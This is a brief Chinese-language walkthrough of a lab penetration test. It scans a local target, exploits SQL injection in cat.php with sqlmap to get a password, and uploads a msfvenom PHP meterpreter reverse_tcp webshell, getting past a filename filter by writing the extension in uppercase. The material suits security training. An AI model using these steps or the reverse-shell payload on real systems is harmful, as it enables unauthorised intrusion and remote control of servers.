攻擊機:192.168.32.152
靶機 :192.168.32.157
掃描靶機掃端口:
開放了ssh和80
看下ssh版本有沒有漏洞,searchsplot下,沒有發現
dirb掃描下目錄,有個admin的打開
進入到一個登錄界面,隨時試了幾個弱口令,不行
用掃描器吧,打開owasp zap掃一下
直接掃到了一個注入點 http://192.168.32.157/cat.php?id=3 ,直接sqlmap跑一下
存在注入,那么直接,爆庫,爆字段,爆關鍵字,發現了password:
登進來了
找到一個上傳點
再制作一個webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 -f raw
上傳時發現文件名不能包含php,那就改成PHP即可
上傳成功后,再用msf監聽端口,拿到shell